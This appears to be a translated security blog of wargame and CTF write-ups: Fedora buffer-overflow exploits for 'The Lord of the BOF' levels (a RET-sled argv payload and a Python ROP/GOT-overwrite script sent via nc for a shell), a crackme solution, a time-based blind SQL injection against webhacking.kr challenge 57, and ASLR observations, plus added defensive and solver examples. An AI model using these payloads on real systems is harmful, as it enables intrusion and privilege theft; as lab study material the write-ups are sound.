When the server is Apache, a built-in behaviour of Apache means that when the same page is called with the same session, the other page does not run until the script of the first page has finished completely.


Posted by windowhan

set *(type*)pointer_address = value

Example)

(gdb) set *(long*)0xb7fcc104 = 0xb7fcc10c
(gdb) x/x 0xb7fcc104
0xb7fcc104: 0xb7fcc10c
(gdb) 
0xb7fcc108: 0x0804858e
(gdb) 
0xb7fcc10c: 0x00031337
(gdb) 
0xb7fcc110: 0x007db0e7
(gdb) 


Posted by windowhan

I heard that FC3 does not, but from FC4 onward ASLR is applied to the temporary buffer.

On FC4 only two digits are randomized, so it looks usable with a brute-force attack.


What is strange is that on FC13 ASLR is not properly applied to the temporary buffer.

I am not sure why.


If it is off, I might as well use it.

Posted by windowhan

When data is placed at a particular location, a null byte seems to be appended after it.


So if the canary sits right after the ret, that null can clobber the canary; be careful.


(gdb) x/100x $esp
0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1
0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161
0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a
0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000
0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161
(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res
(gdb) r < res
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/cruel/tmp/enigma < res
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x576000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you : 
Breakpoint 3, 0x08048526 in vuln ()
(gdb) x/100x $esp
0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1
0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161
0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363
0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000
0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161


It seems to append \x0a\x00 after the data.

Posted by windowhan

Here is the challenge source.


 


[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];


    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }


    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}


 


The shape is quite simple.


However, up to Fedora Core 3 arguments are referenced relative to ebp, whereas from Fedora Core 4 they are referenced relative to esp.


(Personally I would think that using esp rather than ebp as the base would be awkward, since esp changes every time the stack moves... I will probably find out the reason as I study more later, haha)


 


To serve as the argument we need data that does not change and sits at a fixed location.


Data in the data segment can be used as the argument by pointing a symbolic link at it.


 


(gdb) x/8x $esp
0xbf92401c: 0x007bad7f 0x00000002 0xbf9240a4 0xbf9240b0
0xbf92402c: 0xbf924060 0x00795898 0x007a3878 0xb7f26690
(gdb)
0xbf92403c: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbf92404c: 0xbf924078 0xbf924020 0x007bad44 0x00000000


 


ret amounts to pop %eip, and because of how pop works, esp increases by 4 each time.


So after roughly nine rets, the data at 0x08048454 will sit at esp+4 and be taken as the argument.


 


[dark_stone@Fedora_2ndFloor tmp]$ xxd err | grep cve -A 2
0000000: 6578 6563 7665 2822 2e2f 6372 7565 6c22  execve("./cruel"
0000010: 2c20 5b22 2e2f 6372 7565 6c22 2c20 2261  , ["./cruel", "a
0000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
--
0000680: 3330 300a 6578 6563 7665 2822 5589 e557  300.execve("U..W
0000690: 5653 83ec 0ce8 222c 205b 2222 2c20 2251  VS....", ["", "Q
00006a0: 5c32 3034 5c34 5c31 3051 5c32 3034 5c34  \204\4\10Q\204\4


 


[dark_stone@Fedora_2ndFloor ~]$ gcc -o `perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x0c\xe8"'` ./tmp/shell.c


 


[dark_stone@Fedora_2ndFloor ~]$ ./cruel `perl -e 'print "a"x260,"\x51\x84\x04\x08"x9,"\x68\x2d\x83"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQQQQQQQQQh-
sh-3.00$ id
uid=501(cruel) gid=501(cruel) groups=500(dark_stone) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
come on, come over
sh-3.00$


Posted by windowhan

BAAASIC GNIREENIGNE
Source: HISCHALL 2013
40 points
Description: hehehe
basic50!!.exe

=======================

Let's start with the assembly of the part that reads the input.

.text:00BC1564                 call    INPUUUUUUUUUT

This is where the function that reads the input value is called.

I will explain the routine that follows it.


.text:00BC156C                 mov     eax, 1
.text:00BC1571                 imul    eax, 5
.text:00BC1574                 movsx   ecx, [ebp+eax+buffer[0]]
.text:00BC1579                 cmp     ecx, 69
.text:00BC157C                 jnz     loc_BC16D2

It compares the byte 5 away from buffer[0] (buffer[5]) with 69 ('E').

Looking at loc_BC16D2, it contained the string "wrong".

It is probably the code that runs when the input is wrong, so we construct a string that avoids that path.

Current BUFFER = ?????E???????????


.text:00BC1582                 mov     eax, 1
.text:00BC1587                 shl     eax, 0
.text:00BC158A                 movsx   ecx, byte ptr [ebp+eax-1Ch]
.text:00BC158F                 xor     ecx, 9
.text:00BC1592                 cmp     ecx, 'p'
.text:00BC1595                 jnz     loc_BC16D0


(Skimming it in Hex-Rays, the shl here does not seem to matter.)

This time there is an expression x ^ 9 = 'p' on buffer[1].

Since 112 ^ 9 = 'y', input[1] = 'y'.

Current BUFFER = ?y???E??????


.text:00BC159B                 mov     eax, 1
.text:00BC15A0                 imul    eax, 15
.text:00BC15A3                 movsx   ecx, byte ptr [ebp+eax-1Ch]
.text:00BC15A8                 sub     ecx, 10
.text:00BC15AB                 cmp     ecx, 87

Looking at the assembly, no index larger than 15 appears, so the string is probably 16 characters long.

It compares buffer[15] with 87 + 10 ('a').

Current BUFFER = ?y???E?????????a




.text:00BC15B4                 mov     eax, 1
.text:00BC15B9                 imul    eax, 6
.text:00BC15BC                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC15C0                 mov     byte ptr [ebp+Str1], cl
.text:00BC15C3                 mov     eax, 1
.text:00BC15C8                 imul    eax, 7
.text:00BC15CB                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC15CF                 mov     byte ptr [ebp+Str1+1], cl
.text:00BC15D2                 mov     eax, 1
.text:00BC15D7                 shl     eax, 3
.text:00BC15DA                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC15DE                 mov     [ebp+var_36], cl
.text:00BC15E1                 mov     eax, 1
.text:00BC15E6                 imul    eax, 9
.text:00BC15E9                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC15ED                 mov     byte ptr [ebp+var_35], cl
.text:00BC15F0                 mov     eax, 1
.text:00BC15F5                 imul    eax, 0Ah
.text:00BC15F8                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC15FC                 mov     byte ptr [ebp+var_35+1], cl
.text:00BC15FF                 mov     eax, 1
.text:00BC1604                 imul    eax, 0Bh
.text:00BC1607                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC160B                 mov     byte ptr [ebp+var_35+2], cl
.text:00BC160E                 mov     eax, 1
.text:00BC1613                 imul    eax, 0Ch
.text:00BC1616                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC161A                 mov     byte ptr [ebp+var_35+3], cl
.text:00BC161D                 mov     eax, 1
.text:00BC1622                 imul    eax, 0Dh
.text:00BC1625                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC1629                 mov     byte ptr [ebp+var_31], cl
.text:00BC162C                 mov     eax, 1
.text:00BC1631                 imul    eax, 0Eh
.text:00BC1634                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC1638                 mov     byte ptr [ebp+var_31+1], cl
.text:00BC163B                 mov     [ebp+var_2F], 0
.text:00BC163F                 xor     eax, eax
.text:00BC1641                 mov     [ebp+var_2E], eax
.text:00BC1644                 mov     [ebp+var_2A], eax
.text:00BC1647                 mov     [ebp+var_26], ax
.text:00BC164B                 push    offset Str2     ; "paktdlTdm"


buffer[6] ~ buffer[15] is compared with the string paktdlTdm.

Current BUFFER = ?y???EpaktdlTdma


mov     eax, 1
.text:00BC1665                 imul    eax, 0
.text:00BC1668                 movsx   ecx, [ebp+eax+buffer[0]]
.text:00BC166D                 cmp     ecx, 'd'

buffer[0] is compared with 'd'.

Current BUFFER = dy???EpaktdlTdma


mov     eax, 1
.text:00BC1677                 shl     eax, 1
.text:00BC1679                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC167D                 mov     byte ptr [ebp+var_48], cl
.text:00BC1680                 mov     eax, 1
.text:00BC1685                 imul    eax, 3
.text:00BC1688                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC168C                 mov     byte ptr [ebp+var_48+1], cl
.text:00BC168F                 mov     eax, 1
.text:00BC1694                 shl     eax, 2
.text:00BC1697                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC169B                 mov     [ebp+var_46], cl
.text:00BC169E                 xor     eax, eax
.text:00BC16A0                 mov     [ebp+var_45], ax
.text:00BC16A4                 push    offset aAka     ; "aka"
.text:00BC16A9                 lea     eax, [ebp+var_48]
.text:00BC16AC                 push    eax             ; Str1


buffer[1] ~ buffer[3] is compared with the string aka.

Current BUFFER = dyakaEpaktdlTdma
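As an added example (not from the original post), here is the comparison chain reconstructed in Python from the disassembly above, together with a solver that inverts each check. The byte indices follow the shl/imul values in the listing (shl eax,1 / imul eax,3 / shl eax,2 select buffer[2..4], imul eax,6..0Eh select buffer[6..14]), and the two string checks are assumed to be strcmp calls that follow the push offset lines.

```python
# Added example: re-implementation of the checks read out of the basic50!!.exe
# disassembly, plus a solver. Index mapping from the listing:
#   imul eax,5  -> buffer[5]      shl eax,0 -> buffer[1]     imul eax,15 -> buffer[15]
#   imul eax,6..0Eh -> buffer[6..14]   imul eax,0 -> buffer[0]
#   shl eax,1 / imul eax,3 / shl eax,2 -> buffer[2..4]
# The strcmp calls after "push offset Str2" / "push offset aKa" are assumed.

def check(buf: bytes) -> bool:
    """Mirror of the comparison chain; True only when every jump to the
    'wrong' block is avoided."""
    if len(buf) != 16:                     # no index above 15 appears
        return False
    if buf[5] != 69:                       # cmp ecx, 69  ('E')
        return False
    if buf[1] ^ 9 != ord('p'):             # xor ecx, 9 ; cmp ecx, 'p'
        return False
    if buf[15] - 10 != 87:                 # sub ecx, 10 ; cmp ecx, 87
        return False
    if buf[6:15] != b"paktdlTdm":          # Str1 <- buffer[6..14]; strcmp Str2
        return False
    if buf[0] != ord('d'):                 # cmp ecx, 'd'
        return False
    if buf[2:5] != b"aka":                 # var_48 <- buffer[2..4]; strcmp "aka"
        return False
    return True

def solve() -> bytes:
    """Invert each constraint; every check pins its bytes uniquely."""
    buf = bytearray(b"?" * 16)
    buf[5] = 69
    buf[1] = ord('p') ^ 9                  # xor is its own inverse: 112 ^ 9 = 121 ('y')
    buf[15] = 87 + 10                      # 97 ('a')
    buf[6:15] = b"paktdlTdm"
    buf[0] = ord('d')
    buf[2:5] = b"aka"
    return bytes(buf)

if __name__ == "__main__":
    key = solve()
    print(key.decode(), check(key))        # dyakaEpaktdlTdma True
```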



Normally I have trouble reading assembly, but going through it alongside Hex-Rays was actually fun and the answer came out, heh.

I don't think one should trust Hex-Rays too much, though.

Posted by windowhan

Challenge 57

Wargame/webhacking.kr 2014. 2. 24. 22:11

This is the source given as the hint.

=============================================================================

<html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?
$secret_key="????";

if(time()>1309064400) exit("오후 2시에 공개됩니다.");

if($_POST[pw])
{
    if($_POST[pw]==$secret_key)
    {
        mysql_query("delete from challenge57msg");
        @solve();
        exit();
    }
}

if($_GET[msg] && $_GET[se])
{
    if(eregi("from|union|select|and|or|not|&|\||benchmark",$_GET[se])) exit("Access Denied");

    mysql_query("insert into challenge57msg(id,msg,pw,op) values('$_SESSION[id]','$_GET[msg]','$secret_key',$_GET[se])");
    echo("Done<br><br>");
}

?>

<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>

<form method=post action=index.php>
Secret key : <input name=pw><input type=submit><br><br>
</form>

<br><br><a href=indexbackupfile.phps>phps</a>
<br><br><br>
<center>Thanks to <a href=http://webhacking.kr/index.php?mode=information&id=blueh4g>BlueH4g</a></center>
<br><br><br>

</body>
</html>

=============================================================================

http://webhacking.kr/challenge/web/web-34/index.php?msg=sadf&se=if(ascii(substr(pw,0,1))>0,sleep(100),1)


Because se is not wrapped in single quotes like this, the challenge is solved by attempting a time-based blind SQL injection using an if expression.


Passing a very large number to sleep puts load on the server, so give it a reasonable value.
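Added example, not part of the challenge or the original post: the eregi() blacklist from the hint source ported to Python next to the fix a defender would apply to this page (accept only the two radio-button values for se and bind every field as a parameter). sqlite3 stands in for MySQL; the table, session id and message are constructed sample data.

```python
# Added example: why the keyword blacklist on `se` fails and what the fix looks like.
# `se` is an integer column inserted without quotes, so the expression shown in the
# post contains none of the listed words and passes eregi(); a strict whitelist
# plus a parameterised INSERT removes the problem instead of chasing keywords.
import re
import sqlite3

BLACKLIST = re.compile(r"from|union|select|and|or|not|&|\||benchmark", re.I)

def blacklist_blocks(se: str) -> bool:
    """Port of: if(eregi("from|union|select|and|or|not|&|\||benchmark",$_GET[se]))"""
    return BLACKLIST.search(se) is not None

def parse_se_strict(se: str):
    """Whitelist: the form only ever sends '1' or '0'; anything else is rejected."""
    return int(se) if se in ("0", "1") else None

def insert_message(conn, session_id: str, msg: str, secret_key: str, se: str) -> bool:
    """Parameterised version of the vulnerable INSERT; False when input is rejected."""
    op = parse_se_strict(se)
    if op is None:
        return False
    conn.execute(
        "insert into challenge57msg(id,msg,pw,op) values(?,?,?,?)",
        (session_id, msg, secret_key, op),   # values are bound, never spliced in
    )
    return True

def demo() -> dict:
    conn = sqlite3.connect(":memory:")       # constructed stand-in for the MySQL table
    conn.execute("create table challenge57msg(id text, msg text, pw text, op integer)")
    normal = "1"                                       # what the radio button sends
    probe = "if(ascii(substr(pw,0,1))>0,sleep(100),1)"  # the expression quoted in the post
    results = {
        "blacklist_blocks_normal": blacklist_blocks(normal),
        "blacklist_blocks_probe": blacklist_blocks(probe),   # False: no listed keyword
        "strict_accepts_normal": insert_message(conn, "sess", "hi", "????", normal),
        "strict_accepts_probe": insert_message(conn, "sess", "hi", "????", probe),
    }
    results["rows"] = conn.execute("select op from challenge57msg").fetchall()
    return results

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```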

Posted by windowhan

guest@notroot-virtual-machine:~$ ulimit -s unlimited
guest@notroot-virtual-machine:~$ cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
08053000-08054000 r--p 0000a000 08:01 393239     /bin/cat
08054000-08055000 rw-p 0000b000 08:01 393239     /bin/cat
0a01a000-0a03b000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40020000-40021000 r--p 0001f000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40021000-40022000 rw-p 00020000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40023000-40025000 rw-p 00000000 00:00 0
40025000-40026000 r--p 00855000 08:01 2236817    /usr/lib/locale/locale-archive
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e6000-401e8000 r--p 001ae000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e8000-401e9000 rw-p 001b0000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e9000-401ed000 rw-p 00000000 00:00 0
401ed000-403ed000 r--p 00000000 08:01 2236817    /usr/lib/locale/locale-archive
403ed000-4051f000 r--p 00858000 08:01 2236817    /usr/lib/locale/locale-archive
bfacf000-bfaf0000 rw-p 00000000 00:00 0          [stack]
guest@notroot-virtual-machine:~$ cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
08053000-08054000 r--p 0000a000 08:01 393239     /bin/cat
08054000-08055000 rw-p 0000b000 08:01 393239     /bin/cat
0904d000-0906e000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40020000-40021000 r--p 0001f000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40021000-40022000 rw-p 00020000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40023000-40025000 rw-p 00000000 00:00 0
40025000-40026000 r--p 00855000 08:01 2236817    /usr/lib/locale/locale-archive
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e6000-401e8000 r--p 001ae000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e8000-401e9000 rw-p 001b0000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e9000-401ed000 rw-p 00000000 00:00 0
401ed000-403ed000 r--p 00000000 08:01 2236817    /usr/lib/locale/locale-archive
403ed000-4051f000 r--p 00858000 08:01 2236817    /usr/lib/locale/locale-archive
bfafc000-bfb1d000 rw-p 00000000 00:00 0          [stack]
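Added example, not part of the original post: a checker for what the two `cat /proc/self/maps` runs above make visible. With an unlimited stack rlimit the 32-bit kernel selects the legacy bottom-up mmap layout, which on kernels of that era starts at 0x40000000 with no random offset, so ld.so, libc and the vdso sit at the same address in both runs while only [heap] and [stack] move. The function diffs two maps snapshots and lists every region whose base did not change; the embedded input is trimmed from the dumps above.

```python
# Added example: compare two /proc/self/maps snapshots and report regions whose
# base address is identical in both runs (an indication that ASLR is not
# effective for them, e.g. after `ulimit -s unlimited` on 32-bit).
import re
from typing import Dict, List

# start-end perms offset dev inode [path]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\S+\s+\d+\s*(.*)$")

def base_addresses(maps_text: str) -> Dict[str, int]:
    """Map each named region (path, [heap], [stack], [vdso]) to its lowest start."""
    bases: Dict[str, int] = {}
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        start, name = int(m.group(1), 16), m.group(4) or "<anon>"
        bases[name] = min(start, bases.get(name, start))
    return bases

def unrandomized_regions(run_a: str, run_b: str) -> List[str]:
    """Names of regions mapped at the same base in both runs."""
    a, b = base_addresses(run_a), base_addresses(run_b)
    return sorted(n for n in a if n in b and a[n] == b[n] and n != "<anon>")

# Lines taken from the two dumps above, trimmed to the regions of interest.
RUN_A = """\
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
0a01a000-0a03b000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
bfacf000-bfaf0000 rw-p 00000000 00:00 0          [stack]
"""
RUN_B = """\
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
0904d000-0906e000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
bfafc000-bfb1d000 rw-p 00000000 00:00 0          [stack]
"""

if __name__ == "__main__":
    for name in unrandomized_regions(RUN_A, RUN_B):
        print("fixed base across runs:", name)
```

/bin/cat is listed too because it is a non-PIE executable, which is expected; the libraries and vdso appearing in the list is the finding.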

Posted by windowhan

Here is the challenge source.

 

[evil_wizard@Fedora_1stFloor tmp]$ cat ../dark_stone.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - dark_stone
 - Remote BOF on Fedora Core 3
 - hint : GOT overwriting again
 - port : TCP 8888
*/

#include <stdio.h>

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main()
{
 char buffer[256];
 char saved_sfp[4];
 int length;
 char temp[1024];

 printf("dark_stone : how fresh meat you are!\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);

 // for disturbance RET sleding
 length = strlen(temp);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 // buffer cleaning
 memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

 printf("%s\n", buffer);
}

 

It is the same challenge as the previous one; the difference is that the previous one was local and this one is remote.

 

Challenge 4: http://windowhan.tistory.com/entry/hellfire-evilwizard (solved the same way as the previous challenge.)

 

Here is the code I wrote.

 

[evil_wizard@Fedora_1stFloor tmp]$ cat ex.py
#!/usr/bin/python
from struct import pack
import os

printf_plt = 0x08048408
printf_got = 0x0804984c
strcpy_plt = 0x08048438

garget1 = 0x08048484 #0xc0
garget2 = 0x0804838c #0x07
garget3 = 0x080482b4 #0x75
garget4 = 0x0804982c #0x00

b_garget1 = 0x0804872d #h
b_garget2 = 0x08048287 #s
b_garget3 = 0x08048114 #/
b_garget4 = 0x08048720 #n
b_garget5 = 0x0804811d #i
b_garget6 = 0x08048117 #b
b_garget7 = 0x08048114 #/
b_garget8 = 0x0804982c #\x00

func_stack = 0x08049874 #system function address
binsh_stack = 0x8049980 #/bin/sh address
final_binsh_stack = 0x08049ad0
ppr = 0x080484f3 #pop;pop;ret
binsh = 0x00833603 #"/bin/sh"

p = lambda x : pack("<L",x)

payload = ""
payload += "\x90"*268
payload += p(strcpy_plt) + p(ppr) + p(func_stack+0) + p(garget1)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+1) + p(garget2)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+2) + p(garget3)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+3) + p(garget4)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+4) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+5) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+6) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+7) + p(b_garget8)
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(func_stack)

payload += p(printf_plt) + "\x90"*4 + p(binsh)

print payload

 

 

=========================================================================

 

[evil_wizard@Fedora_1stFloor tmp]$ (python ex.py;cat)|nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-ps^Hass
/bin/sh: line 3: my-pass: command not found
my-pass
euid = 505
let there be light

 

==========================================================================

 

[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

 

==================================================================

I should have been finding 07, but I was finding 00 and inserting that...

The real address of system is 0x7507c0, but I was writing 0x7500c0 and executing some random place.. haha.. -_-;;

 

Got the item the boss mob was holding, haha

 

 

Posted by windowhan

That way I would at least do the minimum amount of studying..

Posted by windowhan